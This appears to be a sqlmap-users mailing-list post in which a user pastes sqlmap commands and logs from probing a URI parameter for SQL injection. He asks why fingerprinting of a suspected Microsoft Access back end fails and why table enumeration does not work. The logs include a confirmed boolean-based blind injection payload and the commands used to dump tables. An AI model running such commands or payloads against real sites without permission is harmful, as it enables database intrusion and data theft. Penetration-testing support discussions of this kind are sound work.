Hi, I am using sqlmap to scan a specific GET parameter of a target site. I know there is a SQL injection in parameter 2:
python sqlmap.py -u "http://example.net/de/de*/site"; --batch sqlmap gives me the following result: > … > [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be > injectable (possible DBMS: Microsoft Access) > [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*' > [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or > HAVING clause' injectable > [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could > be Microsoft Access. Do you want to skip test payloads specific for other > DBMSes? [Y/n] Y > [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' > [16:36:29] [INFO] automatically extending ranges for UNION query injection > technique tests as there is at least one other potential injection technique > found > [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a > false positive > [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep > testing the others (if any)? [y/N] N > sqlmap identified the following injection points with a total of 34 HTTP(s) > requests: > --- > Place: URI > Parameter: #1* > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site > --- > [16:37:11] [INFO] testing Microsoft Access > [16:37:13] [INFO] confirming Microsoft Access > [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access > [16:37:14] [INFO] testing MySQL > [16:37:16] [WARNING] the back-end DBMS is not MySQL > [16:37:16] [INFO] testing Oracle > [16:37:17] [WARNING] the back-end DBMS is not Oracle > [16:37:17] [INFO] testing PostgreSQL > [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL > [16:37:18] [INFO] testing Microsoft SQL Server > [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server > [16:37:19] [INFO] testing SQLite > [16:37:20] [WARNING] the back-end DBMS is not SQLite > [16:37:20] [INFO] testing Firebird > [16:37:21] [WARNING] the back-end DBMS is not Firebird > [16:37:21] [INFO] testing SAP MaxDB > [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB > [16:37:22] [INFO] testing Sybase > [16:37:23] [WARNING] the back-end DBMS is not Sybase > [16:37:23] [INFO] testing IBM DB2 > [16:37:24] [WARNING] the back-end DBMS is not IBM DB2 > [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end > database management system, but from the HTML error page it was possible to > determinate that the back-end DBMS is Microsoft Access. Do not specify the > back-end DBMS manually, sqlmap will fingerprint the DBMS for you > [16:37:24] [WARNING] HTTP error codes detected during testing: > 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times > > [*] shutting down at 16:37:24 I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or not? When I manually try following URL in my browser "http://example.net/de/de'/site" I get a 500 HTML-page with output "Microsoft JET Database Engine Error …" so I would say the DBMS is MS Access. When I now try to get for example all tables, then following happens: > python sqlmap.py -u "example.net/de/de*/site" --batch --tables > > sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability and > are not responsible for any misuse or damage caused by this program > > [*] starting at 16:38:02 > > [16:38:05] [INFO] custom injection marking character ('*') found in option > '-u'. Do you want to process it? [Y/n/q] Y > [16:38:05] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: URI > Parameter: #1* > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site > --- > [16:38:07] [INFO] testing MySQL > [16:38:08] [INFO] heuristics detected web page charset 'ascii' > [16:38:08] [WARNING] the back-end DBMS is not MySQL > [16:38:08] [INFO] testing Oracle > [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2' > [16:38:09] [WARNING] the back-end DBMS is not Oracle > [16:38:09] [INFO] testing PostgreSQL > [16:38:10] [WARNING] reflective value(s) found and filtering out > [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL > [16:38:10] [INFO] testing Microsoft SQL Server > [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server > [16:38:11] [INFO] testing SQLite > [16:38:12] [WARNING] the back-end DBMS is not SQLite > [16:38:12] [INFO] testing Microsoft Access > [16:38:12] [INFO] confirming Microsoft Access > [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access > [16:38:13] [INFO] testing Firebird > [16:38:14] [WARNING] the back-end DBMS is not Firebird > [16:38:14] [INFO] testing SAP MaxDB > [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB > [16:38:15] [INFO] testing Sybase > [16:38:16] [WARNING] the back-end DBMS is not Sybase > [16:38:16] [INFO] testing IBM DB2 > [16:38:17] [WARNING] the back-end DBMS is not IBM DB2 > [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end > database management system. Support for this DBMS will be implemented at some > point > [16:38:17] [WARNING] HTTP error codes detected during testing: > 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times > > [*] shutting down at 16:38:17 Even when i try to use --text-only or --not-string switches I am not able to receive the tables. Any ideas? Best regards Volker Nebelung
signature.asc
Description: Message signed with OpenPGP using GPGMail
------------------------------------------------------------------------------ LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial Remotely access PCs and mobile devices and provide instant support Improve your efficiency, and focus on delivering more value-add services Discover what IT Professionals Know. Rescue delivers http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
